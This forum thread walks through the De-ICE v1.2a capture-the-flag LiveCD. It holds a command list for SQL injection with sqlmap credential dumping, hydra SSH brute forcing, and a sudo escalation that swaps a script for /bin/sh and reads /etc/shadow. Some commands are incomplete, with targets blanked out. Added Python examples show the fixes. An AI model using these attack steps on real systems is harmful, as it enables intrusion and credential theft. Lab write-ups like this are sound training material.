
Thread: [Video] v1.2a (1.20a) {Level 1-Disk 3-Version A}

  1. #1 - g0tmi1k (Moderator, joined Feb 2010)

    [Video] v1.2a (1.20a) {Level 1-Disk 3-Version A}


    Brief Overview
    De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version A", and should not be confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup. Releases (in date order):


    • Pre-setup (configured IP as the host has a static IP in range)
    • Scan network for the host (nmap)
    • Port scanned host (unicornscan)
    • Enumerated running services running open ports (nmap)
    • Discovered a SQL Injection (Firefox)
    • Dump all usernames & passwords to the database (sqlmap)
    • Tested for any repeated logins with known usernames & working passwords (hydra)
    • Escalated privilege by incorrectly configured settings (sudo)

    What do I need?

    A quick "ping" scan with nmap shows which hosts are connected to the network. Once the target had been discovered, a detailed port scan (TCP & UDP) was taken by using unicornscan. To check the results, another detailed TCP port scan was done, though this time it was done using nmap. Unicornscan uses a lot less time to do a port scan compared to nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by "information gathering". The attacker uses the "-A" option, which allows for "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details", as well as increasing the scan speed by "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.

    The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows for the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code allowed with it.

    The attacker uses sqlmap to speed up the injection process, as it is designed to test multiple injection methods. sqlmap has pre-built commands which allow the attacker to find common sensitive information (such as: the running services and versions, the current user and whether they are the database admin, user privileges, as well as viewing every table along with the contents). The attacker chooses to capture all the users and their passwords to the database services. The passwords used in the database are encrypted; however, they use a well-known scheme which is easily cracked. The result of this gives the attacker 50 working usernames as well as 49 known passwords too.

    The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else's known password, any blank passwords or their usernames as the passwords), by brute forcing the SSH remote login. The result of this action gives the attacker remote access to the system with 50 credentials.

    On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing the "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file - they have been. The attacker then backs up the file and replaces it with their own file - which is a shell prompt.

    The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).

    As the attacker now has access to the complete system, they access every user folder at once and view random files at their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them out for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).

    Game over
    Last edited by g0tmi1k; 08-12-2011 at 11:25 AM.
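The "products.php?id=1" weakness described in the post is the classic case of a request parameter concatenated straight into a query. The block below is an added example (not code from the original post or from De-ICE): it reproduces that flaw against a constructed in-memory SQLite table and puts the parameterized version beside it, so the difference sqlmap is probing for can be seen without any target. The table name and contents are made up for the demonstration.

```python
"""Added example, not from the original post: a vulnerable product lookup
beside its parameterized fix, run against a constructed SQLite table."""
import sqlite3


def make_db():
    # Constructed sample data standing in for the "Data Entry" site's table.
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, note TEXT)"
    )
    con.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [
            (1, "Widget", "public"),
            (2, "Gadget", "public"),
            (3, "Prototype", "internal only"),
        ],
    )
    return con


def lookup_vulnerable(con, raw_id):
    # Mirrors the flaw: the id parameter becomes part of the SQL text, so a
    # value such as "1 OR 1=1" rewrites the WHERE clause instead of being data.
    sql = "SELECT name FROM products WHERE id = " + raw_id + " ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, raw_id):
    # Fix: validate the type first, then bind the value. A bound parameter can
    # never change the structure of the statement, whatever it contains.
    try:
        product_id = int(raw_id)
    except ValueError:
        return []  # not a product id; reject instead of guessing
    rows = con.execute(
        "SELECT name FROM products WHERE id = ? ORDER BY id", (product_id,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("normal request:", lookup_vulnerable(db, "1"))
    print("injected, vulnerable:", lookup_vulnerable(db, "1 OR 1=1"))
    print("injected, parameterized:", lookup_safe(db, "1 OR 1=1"))
```

The same tautology that leaks every row through `lookup_vulnerable` is rejected by `lookup_safe` before a query is even built; with real databases the parameterized form is also what keeps sqlmap's `--dbs` / `--dump` enumeration from having anything to work with.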

  2. #2 - g0tmi1k (Moderator, joined Feb 2010)

    Re: [Video] v1.2a (1.20a) {Level 1-Disk 3-Version A}

    ifconfig eth0
    ifconfig eth0
    ifconfig eth0
    nmap 192.168.1.* -n -sn -sP
    us -H -msf -Iv -p 1-65535 && us -H -mU -Iv -p 1-65535
    nmap -p 1-65535 -T4 -A -v
    firefox    # Add new product -> view product
    cd /pentest/database/sqlmap
    ./ -u "" -f -b --current-user --is-dba --privileges --dbs --dump
    ./ -u "" --users --passwords
    cd output/
    grep -i administrator log
    grep -i localhost log | grep -v : | sort | uniq
    grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed "s/'@'localhost'//" > /tmp/users
    grep "clear-text" log | sort | uniq
    grep "clear-text" log | sort | uniq | sed "s/    clear-text password: //" > /tmp/passwords
    wc -l /tmp/users
    hydra -L /tmp/users -P /tmp/passwords -e ns ssh 2>/dev/null | tee /tmp/output
    #medusa -h -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh
    ssh ccoffee@
    cd scripts
    ls -lah
    sudo -l
    mv getlogs.bkup
    echo "/bin/sh" >
    chmod +x
    ls -l
    sudo /home/ccoffee/scripts/
    id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/
    ls -lAhR /home
    #cat /home/aallen/gravy.txt
    cat /home/aspears/hbkae
    cat /home/bbanter/notes
    cat /home/cchisholm/reminders.text
    cat /home/ccoffee/DONOTFORGET
    #cat /home/hlovell/creepy.doc
    cat /home/jalvarez/draft
    cat /home/jdavenport/company_address.txt
    #cat /home/jdavenport/svrc.txt
    cat /home/jduff/todo.txt
    #cat /home/krenfro/list
    cat /home/ktso/personnel.doc
    #cat /home/kwebber/list
    #cat /home/lmartinez/favorite.txt
    #cat /home/mnader/layout
    cat /home/rpatel/schedule

    • v1.2a has a static IP address of Make sure you are on the same subnet as it!
    • When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
    • Each time you start v1.2a it will generate fresh SSH keys - so it's different each time!
    • I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

    Song: Crazy World (Extended Mix) - J Majik & Wickaman & Ill Behaviour - Danny Byrd Featuring I-Kay
    Video length: 07:40
    Capture length: 29:31
    Blog Post: g0tmi1k: [Video] v1.2a (1.20a) {Level 1 - Disk 3 - Version A}
    Forum Post:;p=2388#p2388 &[video]-de-ice-net-v1-2a-1-20a-{level-1-disk-3-version-}.html#post204394

    Last edited by g0tmi1k; 08-09-2011 at 09:27 AM.
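The privilege escalation in the commands above works because the sudo-permitted script under ~/ccoffee/scripts sits in a directory its own invoker can write to, so `mv` plus `echo "/bin/sh" >` replaces what root will execute. The check below is an added example (not from the original post or from De-ICE): given the user a sudoers rule grants and the command path it names, it walks every component of the path and reports the first one that user could modify, which is exactly what an admin should run before adding such a rule. The directory layout is constructed in a temporary directory and the "nobody" uid 65534 is an assumed principal that owns nothing in it.

```python
"""Added example, not from the original post: find out whether a sudo-permitted
command can be replaced by the user it is granted to."""
import os
import stat
import tempfile


def writable_by(st, uid, gids):
    """True if principal (uid, gids) may write the object described by st."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def weak_sudo_target(path, uid, gids):
    """Return the first path component the user could modify, or None.

    Every directory on the way matters: write access to a parent lets the
    user rename the real file aside and drop a replacement in, which is the
    getlogs trick above. A sticky directory (like /tmp) owned by someone else
    is skipped, since sticky forbids renaming or unlinking others' entries.
    """
    path = os.path.abspath(path)
    current = os.sep
    for part in path.split(os.sep):
        if part:
            current = os.path.join(current, part)
        st = os.stat(current)
        is_dir = stat.S_ISDIR(st.st_mode)
        sticky_protected = is_dir and st.st_mode & stat.S_ISVTX and st.st_uid != uid
        if sticky_protected:
            continue
        if writable_by(st, uid, gids):
            return current
    return None


def demo():
    """Constructed scenario: ~/scripts world-writable, then corrected to 0755.

    Returns (weak_component_was_scripts_dir, result_after_fix).
    """
    home = tempfile.mkdtemp()                 # stands in for /home/ccoffee
    scripts = os.path.join(home, "scripts")
    os.mkdir(scripts)
    target = os.path.join(scripts, "getlogs")  # the sudo-permitted command
    with open(target, "w") as fh:
        fh.write("#!/bin/sh\necho collecting logs\n")
    os.chmod(target, 0o755)
    nobody_uid, nobody_gids = 65534, set()     # assumed principal owning nothing here

    os.chmod(scripts, 0o777)                   # misconfiguration: anyone can rename entries
    weak = weak_sudo_target(target, nobody_uid, nobody_gids)
    os.chmod(scripts, 0o755)                   # fix: only the owner may alter the directory
    fixed = weak_sudo_target(target, nobody_uid, nobody_gids)
    return weak == scripts, fixed


if __name__ == "__main__":
    print("scripts dir flagged while 0777:", demo()[0])
    print("after chmod 0755:", demo()[1])
```

In the walkthrough the invoker owns the whole of /home/ccoffee, so the audit would flag the home directory itself: the fix there is not a chmod but moving the script to a root-owned location such as /usr/local/sbin before naming it in sudoers.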
